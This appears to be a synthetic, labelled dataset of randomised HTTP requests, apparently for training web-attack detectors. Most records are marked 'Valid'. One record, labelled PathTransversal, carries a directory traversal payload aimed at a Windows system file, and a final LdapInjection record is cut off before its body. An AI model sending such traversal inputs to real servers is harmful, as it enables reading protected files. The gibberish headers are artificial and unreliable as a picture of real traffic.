Transfer-Encoding: gzip
Upgrade: ysyAt/4.9, ygi/4.5
Warning: 536 10.92.102.202 "5tc0ut6" "Wed, 19 Aug 09 01:08:40 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 50497242
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

xH=8043987&TtpE=armevsnhgelahh

End - Id: 4698
Start - Id: 10300
class: Valid
GET /cfpasswdTa7RVD/tvvBLhyftwvKd5i-w/aembZPw.u6EUa@6OE/5uo/rmzshi6c92uapseih/owyeqLmeLmnt/pjn2eh-O7B/g8qO1cuIRcZoIiB_/gian/vqZ4hiZVS.TIpckNZ0Q/hvznnttr7rT/oSi.css?iqphfoe0uIil=bapu&Mlib__e.sv=52785935&sTiseiam=e&tnrapMLst0lTg=ltEitaodotih&cire6issehU1le=26434&ssienednnfshIiS=cRZ&aeeanonmwiAUa0=trn&cnclamjsehf=%248e%2FsednA&xedp0rrloioiSq=2yri3yse&t5absre3w=048835 HTTP/1.1
Host: www.cfnrRom.be
Connection: 8tpl
Accept: video/*, application/*, video/*
Accept-Charset: iso-8859-8, utf-8;q=0.8, x-mac-japanese;q=0.2, iso-8859-6
Accept-Encoding: *
Accept-Language: m-nnsei, h-eeatsmE, aoEeo-wwuth, 2ae-ta1Tatdv, z-ey
Cache-Control: max-age=6276
Client-ip: 42.80.49.249
Cookie: bhsij=413
Cookie2: $Version="64"
Date: Thu, 12 Feb 09 18:10:09 CET
ETag: W/"fi7qZFX-_73wO95bbRb"
Expect: 100-continue
From: nS3ts1a@t3dEl.it
If-Modified-Since: Mon, 16 Jul 07 15:51:15 CET
If-Unmodified-Since: Tue, 06 Apr 04 18:33:33 CET
If-Match: *
If-None-Match: "3mOd7SaGm_u7WiJ8-8"
If-Range: Fri, 11 Nov 05 19:15:26 UTC
Max-Forwards: 4344
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: gx9nas 4au7d=n9Ge
Authorization: Basic U21ocGluaXM6ZVdyczlvdA==
Range: 12-5596
Referer: /rAle9Sag/teao/dThtdotn/gtfIosba.pdf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.9 (X11; U; Linux i386 2.9; ui-pa; rv:9.5.5) Gecko/10762093
UA-CPU: 68000
UA-Disp: 118,0565,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 032x7737
Via: 4.0 80.75.251.199, 4.1 www.oiftkb4h.html
Transfer-Encoding: deflate
Upgrade: sawiI/5.5, tetn/9.6, nngke/0.8, gdi/4.8
Warning: 089 77.21.70.73 "oeaacxztie0eaee7elv" "Wed, 05 Oct 05 21:11:47 UTC"
X-Forwarded-For: 134.209.24.233
X-Serial-Number: 86455212
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10300
Start - Id: 27360
class: Valid
GET /tqfDeQYHRJb/eBwQuFx4YJK/abvQyfeeF1mRjLQWI/oaluM/6ZvGRslWE5Ygroup by0d/aePn/nyeceznleul/systemUVlocationv0gUd/oGBOXNbHMgDTzMA5_uW/m8RMchildMP/aKV.htm?pi=Soth%3Eabp8aH&pzsu=76968&pnt=92026&qonaAt=gBKdbMh3&iC2Hwilf2nez=mSO%5D&6a5gtis=1545 HTTP/1.0
Host: 90.158.136.34
Connection: utdic
Accept: */*
Accept-Charset: iso-8859-7, x-mac-arabic, iso-2022-jp, x-mac-cyrillic, windows-1258
Accept-Encoding: compress;q=0.6, deflate, gzip;q=0.5
Accept-Language: fio-etnniaBf, ur-19al;q=0.1
Cache-Control: min-fresh=24
Client-ip: 216.117.63.126
Cookie: weutsios8=594
Cookie2: $Version="666"
Date: Tue, 16 Nov 04 05:23:25 GMT
ETag: "3ooz@O1DCCjzfQ_jl"
Expect: 100-continue
From: awwHpt2M@rHe8oL7N.net
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Thu, 24 Sep 09 03:10:44 GMT
If-Match: "t79yLfeNm3Q7swGqIlP"
If-None-Match: *
If-Range: *
Max-Forwards: 517
MIME-Version: 6.5
Pragma: hosle='fnrot0eN'
Proxy-Authorization: Basic b2FlYTpkaXR1aXJzcw==
Authorization: 2sri lhluO=snculfra
Range: 0920-857572
Referer: http://www.bh91ils.cz/7wssDt.pl
TE: trailers,trailers,chunked;q=0.8
Trailer: Via
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 7.7; ep-ib; rv:5.4.8) Gecko/10891281
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9698x542
Via: 5.5 146.231.130.130, 4.7 117.81.239.13, zih/5.5 165.191.80.201
Transfer-Encoding: compress
Upgrade: eeW/8.4, 80lvm/8.7, iuez/6.4
Warning: 877 60.179.127.50 "ccGMviphn5uaaes" "Sun, 24 Jun 07 15:48:47 UTC"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 7259766093580029
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27360
Start - Id: 19481
class: Valid
GET /Sue0eeszeonnItNh0rn.jsp?5ccmGbgsound=lqsdoeo7esghzitrd&ptG1ekidvvntlsa=erN-nne+enne&tfiiiv=afiO9OelAaH&sis1a4raafwsct=7816&l2osdmenhngt9E=ehur%2B&1X._VAN=bns&ags9b6=700&7PJhu=Grhfessmhqdo&oldntIa9rsu0r=gqehttnsturEhi7&eaoi1yBle3=m+e%294n&mlsYNwGO8X=ai&ornN=7imailbodyaif&nuAf7Atejo=cmtrsQiEtrhnzgatue&XDLX7LJnc=024219 HTTP/1.1
Host: www.se9T.cz
Connection: keep-alive
Accept: image/*, text/html;q=0.5, video/*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.8, gzip, compress, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 158.213.139.113
Cookie: at=&f2xmle;piunth=fH6a;us=saigl;eTnkOse=MmididS0a
Cookie2: $Version="08"
Date: Sun, 20 Jul 08 09:42:07 UTC
ETag: "TFVzorSm0FRV6Wcq"
Expect: Ota8itr=37su6o;yrhfelu=lEih
From: onnnAm1I@spE2Fe0rns.com
If-Modified-Since: Sun, 07 Dec 08 13:49:42 GMT
If-Unmodified-Since: Wed, 12 Jul 06 23:13:26 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Aug 05 04:52:47 CET
Max-Forwards: 816
MIME-Version: 1.9
Pragma: Icaeyua=ac4rtmo
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: Basic aWVvczpvdXV0Yg==
Range: 709901-
Referer: /ldmoeEi/a5tfCl.gif
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.2 (compatible; Konqueror/8.7; Win98; dr2hru8s7; movnTar)
UA-CPU: x86
UA-Disp: 8161,357,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6480x436
Via: odehe/1.1 225.15.102.46, 4.6 80.31.243.17:50
Transfer-Encoding: deflate
Upgrade: hwhe/2.2, tsmOsa/6.5, st7dt/5.8
Warning: 023 www.yttU5rcS.png "umpoHgenaihro" "Mon, 28 Mar 05 07:12:11 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 248225
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19481
Start - Id: 20211
class: Valid
GET /4b7hsl3hhahlc0hn/r2eSr2/ry3wstsrhnoz0/sJripNDWFGf7ecc9xo2/aqlgxPuL0OR/S20m.mspx? HTTP/1.1
Host: 59.214.68.112
Connection: e9eszomE
Accept: */*;q=0.9
Accept-Charset: iso-8859-15;q=0.3, x-mac-greek;q=0.8, euc-cn, windows-1254
Accept-Encoding: *;q=0.7
Accept-Language: eienty-8s;q=0.3, avlLeIsN-wfientea, ie1An-rnyr;q=0.8, ljisejgo-e;q=0.8
Cache-Control: no-transform
Client-ip: 64.108.52.18
Cookie: jo=nsnchase2rGErpsss;oybsesstanii=si ;4evtus=ccE
Cookie2: $Version="305"
Date: Mon, 15 Jan 07 17:42:10 GMT
ETag: "DhMe68WECRdDRYgQ3nDv"
Expect: awrrh3m
From: sNOdola@NEdehceq.uk
If-Modified-Since: Mon, 18 Oct 04 15:57:48 CET
If-Unmodified-Since: Wed, 09 Mar 05 05:29:18 GMT
If-Match: "_a8Dt3qwpSaJiUmzkiF"
If-None-Match: "ALGWA2kFsKMMwmfDL_T"
If-Range: Mon, 13 Jul 09 13:37:00 CET
Max-Forwards: 93
MIME-Version: 0.1
Pragma: nonRsty='rl'
Proxy-Authorization: Digest username="lseoiae3"
Authorization: NTLM YWVobGJ1bU11dGE1c25odWF1eXV2dnZpeXNyYWlub2UzbjhIU2xtbG0=
Range: 365749-,607-065
Referer: http://orngwgos.de/ApemDu/b745iT/e3al/tgeMetre/t6Ednab.mpeg
TE: trailers,deflate;q=0.3,trailers
Trailer: Trailer
User-Agent: cetuts9/8.7.9.9.1
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4940x047
Via: 4.6 243.64.7.193
Transfer-Encoding: deflate
Upgrade: 95h/9.7, Stlpto/4.2, r3o/5.5, rcn/6.8, earzq/4.0
Warning: 396 www.etsot.png "nrlge3atrzigrleagne" "Tue, 20 Nov 07 19:17:59 GMT"
X-Forwarded-For: 43.1.107.121
X-Serial-Number: 554046996797250
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20211
Start - Id: 32474
class: Valid
GET /igha/K9/ueOkE-gS4f/b3is5k.asp? HTTP/1.0
Host: www.etoeetma.net:01726
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesetrad;q=0.6, iso-8859-6, windows-1255, iso-8859-6, utf-7;q=0.4
Accept-Encoding: *
Accept-Language: n-p1x;q=0.9, e-isHau;q=0.1
Cache-Control: min-fresh=4
Client-ip: 17.24.0.103
Cookie: aTdi=rWne;SzXFoN=vf0rg;odefqa0aoit=i2etraRliy;eChecihusJsrah=866708;wgt7FhwlorvMc= b
Cookie2: $Version="9"
Date: Thu, 15 Mar 07 13:37:19 GMT
ETag: W/"Phb_CuN3CBeWzEnJ0F"
Expect: btmuwH=aA9If
From: scRSoeta@cayti.be
If-Modified-Since: Wed, 25 Jan 06 19:46:55 CET
If-Unmodified-Since: Fri, 08 Dec 06 15:45:07 UTC
If-Match: "dS60DOhvi.fCyBI0A1UZ"
If-None-Match: "zyrxQXLj.IPL7gi"
If-Range: Mon, 29 Sep 08 10:43:05 UTC
Max-Forwards: 57
MIME-Version: 9.2
Pragma: teriat=re
Proxy-Authorization: vevw8 1cuh=UotoAAs
Authorization: NTLM cmFld3Roc0hkbmVuYUV0b2pldGxhdWluVW90RWlyc1h0bHJFRW1lbW5lb2E=
Range: 9261-,-602,5969-
Referer: http://www.6yti.it/z4xy7lf/ssyhlcby/8coh.asmx
TE: chunked;q=0.9,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.4 (X11; U; Open BSD i586 6.4; ai-67; rv:9.7.5) Gecko/25006409
UA-CPU: MIPS
UA-Disp: 1956,0325,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 116x3717
Via: 0.4 www.usfiv.jpeg:8, HTTP/3.6 www.eidinbv.html, 5.7 www.csr9.png
Transfer-Encoding: identity
Upgrade: ternt/2.2, gvhrO/1.0, 2n4E3h/6.6, 5tnucz/1.4, tsojiD/3.4
Warning: 045 www.jVoAw.htm:318 "Wteirsteatrhje7brwtl" "Thu, 17 Sep 09 15:24:18 UTC"
X-Forwarded-For: 195.167.138.105
X-Serial-Number: 31593732
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32474
Start - Id: 8776
class: Valid
GET /lfPYTCA/H3_Fgroup byor0d0lS85n7/cooeAheattwp/afm8cyAzIPwlnXTU/E_passthruI_e9/R7tFSUTBw/e7i/u3cat_e/oeEgSeaHhotdesaommam/sf1.jpeg? HTTP/1.1
Host: 23.45.24.249
Connection: close
Accept: image/*, audio/x-wav;q=0.5
Accept-Charset: cp-932, iso-8859-9, x-mac-chinesesimp, x-mac-japanese, x-mac-ce
Accept-Encoding: deflate, deflate, deflate;q=0.4, identity, gzip
Accept-Language: ore79-nFo
Cache-Control: max-stale=2
Client-ip: 219.207.2.8
Cookie: IeTLeaehoqtsutx=3874188;owzkN5siltitia=auYGl@tTot9l;edinbbh3Sxs=99619263;.-PB=976532;e6eas=zfk8z;ag2l=Eia
Cookie2: $Version="695"
Date: Mon, 08 Aug 05 12:10:54 UTC
ETag: W/"mN-q7y62RCi4Ex1"
Expect: 100-continue
From: ytshor@Dl5ho0zri.ch
If-Modified-Since: Thu, 22 Sep 05 10:39:47 GMT
If-Unmodified-Since: Sun, 18 Sep 05 22:33:56 GMT
If-Match: "GiBpV7ySLsRQiIc_"
If-None-Match: "WALySLz07Zixd_jN"
If-Range: "astluQdMNyb3yIPV"
Max-Forwards: 456
MIME-Version: 1.9
Pragma: 1=h0qe
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Digest uri=/tw6uw/sair/zlUepon2.wmn
Range: -914608,-7
Referer: /lfr0ln/t3ao7n/X6o3nd/fdtenf/oion.php3
TE: chunked,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/0.7 (compatible; Konqueror/2.0; Windows NT; ohhUi)
UA-CPU: 68000
UA-Disp: 735,9558,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 633x2304
Via: 5.8 106.78.217.193:1916, 2.1 www.cssis6a.jpeg
Transfer-Encoding: gzip
Upgrade: imnd/5.9
Warning: 295 www.nais.htm "ioTseniTrnsie" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8776
Start - Id: 45588
class: PathTransversal
GET /tZwF.htm?dder6i=w%40+a&o2ltte=oaoqaeoseaThgdfrza&O1dzo=tDEv7P4o&utoa8=hio%24f&eitesnzabr=e&sT=383&tro=i_0j&IclIebue=h_hp&et5E=etkjsejragr&wlocationtyFdfn2SMr=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&hanoml2a7=okben&Q1m8all=Me3t&iuotubalain=sC4EMuxUa HTTP/1.0
Host: www.nediTNi.st
Connection: trdhha
Accept: */*
Accept-Charset: iso-8859-2, windows-1258;q=0.7, x-mac-chinesetrad, iso-8859-8-i;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: hmria-4S;q=0.4, ddhd0eeo-dso, s-o, WuJltex-BeyxsOiy;q=0.0, tlhhi-nlxyb
Cache-Control: max-age=30
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Thu, 29 Nov 07 16:35:55 CET
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: 100-continue
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Mon, 25 Aug 08 12:09:23 CET
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: "q4t7QLLup-X_Lvm"
If-None-Match: "qKIFnAfIf@bzpURXptw"
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 823
MIME-Version: 9.5
Pragma: eedti=wftdA
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: /nsken/isat/r67a.exe
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (Machintosh; U; Mac OS X 1.5; ef-tp; rv:0.0.7) Gecko/40426364
UA-CPU: StrongARM
UA-Disp: 911,8166,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 9.0 www.Usne0nrh.html
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 368281150283459
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45588
Start - Id: 11489
class: Valid
GET /o9emSBCHKFntpSWfQ-2/ntPrpi6rt/sCsOJS.html? HTTP/1.0
Host: www.tctknl.st:00
Connection: keep-alive
Accept: text/xml;q=0.2, application/*, image/*;q=0.2
Accept-Charset: x-mac-korean, windows-1257, cp-936;q=0.8, x-mac-ce
Accept-Encoding: identity, deflate, gzip, compress;q=0.4, identity;q=0.8
Accept-Language: npwiei-ax0ooi, tpmN7sow-nkYdt;q=0.0
Cache-Control: min-fresh=404
Client-ip: 170.41.229.75
Cookie: 2xp_kWMO=994311;60oRo=pokg8teeats;awhedeqoe=r
Cookie2: $Version="49"
Date: Sun, 27 Jan 08 22:53:25 CET
ETag: "_RkEJQkVi@Ou51M"
Expect: 5Axnntk
From: nhimr5s@b6n6ee1.fr
If-Modified-Since: Wed, 14 Sep 05 05:26:39 CET
If-Unmodified-Since: Sat, 01 Apr 06 10:17:04 UTC
If-Match: *
If-None-Match: "DWjl2@NcPH9lRFJhAE"
If-Range: "5qgTXHxcJSPaykBjyWjA"
Max-Forwards: 5534
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest qop=ki3naiu
Authorization: Basic dHBvZWhuaTp2dTlzZA==
Range: -517746,13-
Referer: /umesTnkl/loeh.tar.gz
TE: deflate;q=0.8
Trailer: From
User-Agent: Mozilla/8.5 (Windows; U; Windows NT 1.5; t7-ee; rv:2.2.3) Gecko/71895613
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: 7.7 71.191.4.225, FTP/4.0 106.249.100.80
Transfer-Encoding: identity
Upgrade: aio/4.0
Warning: 505 39.129.64.192 "id9nrarEinrmwdsm" 
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 684447475496
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11489
Start - Id: 17302
class: Valid
GET /_40dP7MrR0W/IathlittzHi0Xradrxds/c5o/sEmmmbYYee/euLJyGrWUoA/o@Y5yxirx/ee/m4cy-kwGCxaEy/ieejsleRo/hM.sd73AzmR7E.tfje5/drkaae3.html?VP3JzdeleteKcU4Kphp=tewunsGA&le=97547&wadeebb=0875614&7iframeIHJNOJ=yzetbxe&lrOSeErrsdot9d=stltaotemt&myhec=Iyj96tcmdaei+ehrD&neehq3mt2=+onad&wEenqntl6nkqvbm=mhtpass&Wrathonaai=oio HTTP/1.1
Host: www.6ip8l0Ccme.net
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1255, euc-kr;q=0.7, macintosh;q=0.8, isiri-3342
Accept-Encoding: identity, compress;q=0.0, deflate;q=0.9, compress, identity
Accept-Language: ds-o4soC;q=0.5
Cache-Control: max-age=1926
Client-ip: 128.82.46.243
Cookie: i6TtcE=189886
Cookie2: $Version="1"
Date: Mon, 22 Jan 07 19:09:25 CET
ETag: "C4iubv94c6uk2uU"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Tue, 16 Dec 08 06:49:30 UTC
If-Unmodified-Since: Sun, 04 Mar 07 09:35:39 GMT
If-Match: *
If-None-Match: "mxFGWEp5l7a6xARp5QDr"
If-Range: Sun, 21 Oct 07 13:58:22 CET
Max-Forwards: 12
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: eirux knieeo=9h8tlf
Range: -03,4-133137
Referer: http://ilT2e.com/lkswxEqb/wdiez/bine.php
TE: deflate,chunked
Trailer: Pragma
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 9.5; 1s-rO; rv:7.8.2) Gecko/58186132
UA-CPU: Sparc
UA-Disp: 7151,7445,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0027x5589
Via: 0.9 www.etmiala6.gif
Transfer-Encoding: identity
Upgrade: ikwg/5.7, sm8ess/6.1
Warning: 526 102.181.177.151 "iqxaehtm" "Wed, 11 Jun 08 17:56:22 GMT"
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17302
Start - Id: 7817
class: Valid
PUT /mGLzaPLR6PbO/fiet6r2fsb3usnzplo/l5N26sN/tdropincludeftpi.asmx? HTTP/1.1
Content-Length: 259
Content-Language: on
Content-Encoding: identity
Content-Location: /nnwa/snee/TANnX.txt
Content-MD5: dXRpc21jaWhhaW9jN3NTYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Mar 08 07:45:47 UTC
Last-Modified: Fri, 26 Nov 04 11:20:16 UTC
Host: 70.107.246.89
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, compress, compress, gzip
Accept-Language: *;q=0.7
Cache-Control: max-age=651
Client-ip: 115.95.108.135
Cookie: ea6ItintX6hi=mZuL;3allGBGfZ2DNgn=8;kccadE=8723128;tea=grelotanhn
Cookie2: $Version="087"
Date: Tue, 27 Oct 09 03:30:06 GMT
ETag: "68kh4lmaleAcjYJu.WF"
Expect: Ains
From: msDNtTe@mtt5jy.de
If-Modified-Since: Fri, 04 Nov 05 17:02:30 CET
If-Unmodified-Since: Thu, 18 Dec 08 19:12:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 682
MIME-Version: 6.1
Pragma: jnf=shtgsi
Proxy-Authorization: Digest opaque="lsiErgOm"
Authorization: Basic aWxncjpxaGJh
Range: -4,802-,-65
Referer: http://oldfirs.st/s1RrGt/5dmb/veoixe/d8aps/54n14td.nsf
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 8.9; 8L-ev; rv:7.1.0) Gecko/71399058
UA-CPU: StrongARM
UA-Disp: 716,3667,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 669x1617
Via: HTTP/3.5 9.90.94.25:91, 2.1 www.x7uli2e.jpeg
Transfer-Encoding: compress
Upgrade: le7/5.5, eimt/4.8
Warning: 942 250.5.20.192 "brnistmyZweTt" "Tue, 13 Apr 10 19:40:14 UTC"
X-Forwarded-For: 200.221.62.6
X-Serial-Number: 78120042930082
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

rcld5eede9a=bHoeuenls&b5mbumhfeof=eorLnodeeeehh8&etdseaslaa=ckands&ls=02077&eafSiadTunDDeq=27312&IaghuuNetlnOAd=9515987401&lrooet5tl=ealgroup byad?uaekElib&hlg=h4qcmBnUbf&uaeEeep=itjhym37Tfiinhl&helewt=5298010&jeew=snh'&rrxtqi=d3X3&7i.h9p=lriublisnsvokeoo

End - Id: 7817
Start - Id: 33067
class: Valid
PUT /Z4Ks/fysL8jjc4_z/itsfw/r2AhhfsajNa/pbY.BC8vlbqlq30bsZYH/hi/rhtutetoOmseIoile/s_XVbBtXici3sT@/ephe/ihH@KE559Hf_-ORn5.pl? HTTP/1.1
Content-Length: 41
Content-Language: l
Content-Encoding: deflate
Content-Location: http://www.tenefU.gov/oapn/unooo.jpeg
Content-MD5: czNkd2NmZXRybmUzbTVnaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 May 06 13:02:10 UTC
Last-Modified: Fri, 20 Jan 06 21:15:05 UTC
Host: 180.234.255.251:351
Connection: close
Accept: video/*;q=0.4
Accept-Charset: windows-1255;q=0.9, iso-8859-4, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 198.25.225.124
Cookie: sKacceptZ2=a f];niaugoce=t5EToni;5siasootgcrew=m1A
Cookie2: $Version="308"
Date: Sun, 18 Oct 09 18:08:58 UTC
ETag: W/"gqIWxsvwAx.L8aUb"
Expect: nbOgee
From: sowsRo@erhAjxir.gov
If-Modified-Since: Tue, 07 Apr 09 08:34:09 CET
If-Unmodified-Since: Fri, 08 Feb 08 22:32:53 GMT
If-Match: "8gWwA5ssT6pl@IaLJ@eQ"
If-None-Match: "n9mLB35xR3ArNfGi"
If-Range: "wEZ52R@guE.cNsE"
Max-Forwards: 3
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM NGlsZm91dDJhaUVhcFdpTGVlYWt0dXQycnlvb29kaVRuYnR6N3Ruc29jNzJ6c3Np
Authorization: NTLM ZnJ0a2VlNW9YMm5yaVRjck9UcnYyd2FudHVuaHllR25pOG9lbXRjd28=
Range: 15884-727869,-7,189892-7330
Referer: /lucchhbr/Vss7fnoa/Pstrad.asp
TE: gzip,gzip
Trailer: Accept-Charset
User-Agent: 5ugV@t21on http://www.dnmbitbu.st
UA-CPU: MIPS
UA-Disp: 287,078,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3468x969
Via: 8.2 www.bxtt.css, 7.4 www.6r2or.tiff, HTTP/2.7 www.4fncaui.tiff
Transfer-Encoding: deflate
Upgrade: NbO/9.5, tosea/6.2, stots/4.0, if3/9.5
Warning: 736 247.169.30.239 "bera18znowhiawCntoth" 
X-Forwarded-For: 205.136.153.13
X-Serial-Number: 71160
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PAqYall.Qfposition=ptet &pq5=vF_CFu7YKmBv

End - Id: 33067
Start - Id: 2212
class: Valid
GET /nnqautoexecAalldeleteBmdDf/nhePDhEnth5stesueyS/n6tcwwVRH9DnL3./systemM2On75MSxS/c0KrV/e-YxS@7LY/g@I_wrfwhereGHE/aQ7k4lrrbikH/tHYTIBAx8oqBGuXDpsbn.msf? HTTP/1.1
Host: 7.189.242.197:5
Connection: or7o
Accept: video/*;q=0.2, text/*;q=0.1, image/*
Accept-Charset: windows-1255, windows-1250;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: 7-tteoa;q=0.4, 21-sd;q=0.0
Cache-Control: max-stale=52982
Client-ip: 115.118.121.206
Cookie: igtep=rbzei e;tajh=94219;9pedt8nhbhgk=124;fgmaar8ain=lzu1vAov9my;ithiaj=53
Cookie2: $Version="0"
Date: Wed, 06 Aug 08 09:59:34 GMT
ETag: "A_nl49yV5QH6IaVDMgCZ"
Expect: a3elr
From: tb0ptsP4@sadr.be
If-Modified-Since: Fri, 09 Mar 07 20:42:13 CET
If-Unmodified-Since: Fri, 25 Mar 05 14:50:32 CET
If-Match: "yE07Kxi7uaeVJj-1yu1M"
If-None-Match: *
If-Range: *
Max-Forwards: 068
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest qop=tSvsisht
Authorization: Digest opaque="eaxE"
Range: -9799,98225-
Referer: /aaillter/bk2t/noeaRer.tiff
TE: deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (Windows; U; Win 9x 9.4; nt-nn; rv:4.1.2) Gecko/73628846
UA-CPU: StrongARM
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 504x1598
Via: 0.0 116.185.106.203, 6.1 148.95.219.68:784
Transfer-Encoding: deflate
Upgrade: yEnTa/2.2, edNa/0.7
Warning: 810 www.morweae.jpg "sa4qrwUneheea7hlfh" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 2212
Start - Id: 36910
class: LdapInjection
PUT /eF5IHbCc49P/ahan/1i2tGee/sUtc0@gQMoM1ykCDOn3/hKRof7drunevm/tTx.dll? HTTP/1.0
Content-Length: 238
Content-Language: oAxO5,ahhUttpj,xu
Content-Encoding: gzip
Content-Location: /Eme8ccn/bsipLio/att7ppcr/tdn9lal.mpeg
Content-MD5: YWVzRHJSdHdqaWg5bHNhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 31 Mar 06 03:25:17 UTC
Last-Modified: Mon, 30 May 05 02:24:49 UTC
Host: www.n6eseunet.gov:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.6, identity, gzip
Accept-Language: *;q=0.7
Cache-Control: uoadfol=osAE7n
Client-ip: 20.129.129.141
Cookie: b8pe2ihuedoejad=iJDXhAW
Cookie2: $Version="8"
Date: Sun, 16 Apr 06 24:46:51 CET
ETag: "JjZImyztplyA4.bN-Dt"
Expect: t7eiih=1zBcuhe;elVew
From: hrhrro@yuoTn2us.de
If-Modified-Since: Fri, 12 Nov 04 19:00:22 CET
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: "GZpYr7Gb9XAzLVawwG3B"
If-None-Match: "p1@iPkWAkq9Qno3LQVw2"
If-Range: *
Max-Forwards: 18
MIME-Version: 8.8
Pragma: asM=tooe
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: /dtntr5n/CrlA0/aivsa.jsp
TE: trailers
Trailer: Warning
User-Agent: Mozilla/5.9 (compatible; MSIE 9.4; Win98; ao7szaa; Rf7HOufio; 8mdeae7)
UA-CPU: Sparc
